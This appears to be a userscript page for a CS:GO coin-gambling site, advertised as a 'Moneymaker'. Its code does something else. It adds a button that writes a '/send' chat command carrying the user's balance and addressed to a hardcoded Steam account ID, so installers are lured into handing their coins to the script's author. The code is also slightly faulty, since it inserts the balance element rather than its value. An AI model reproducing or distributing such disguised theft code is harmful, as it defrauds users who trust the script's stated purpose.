Maik many on csgodubble

Moneymaker

このスクリプトの質問や評価の投稿はこちら通報はこちらへお寄せください。
// ==UserScript==
// @name         Maik many on csgodubble
// @namespace    http://www.csgodouble.com/
// @include      http://www.csgodouble.com/
// @version      0.1
// @description  Moneymaker
// ==/UserScript==


var balance = document.getElementById("balance");
var button = document.createElement("input");
button.type = "button";
button.value = "giv mi ur many";
button.onclick = sendCoins;
button.setAttribute("style", "font-size: 12px;");
document.getElementsByClassName("well")[1].appendChild(button);


function sendCoins()
{
    document.getElementById("chatMessage").value = "/send 76561198083506425 " + balance;
}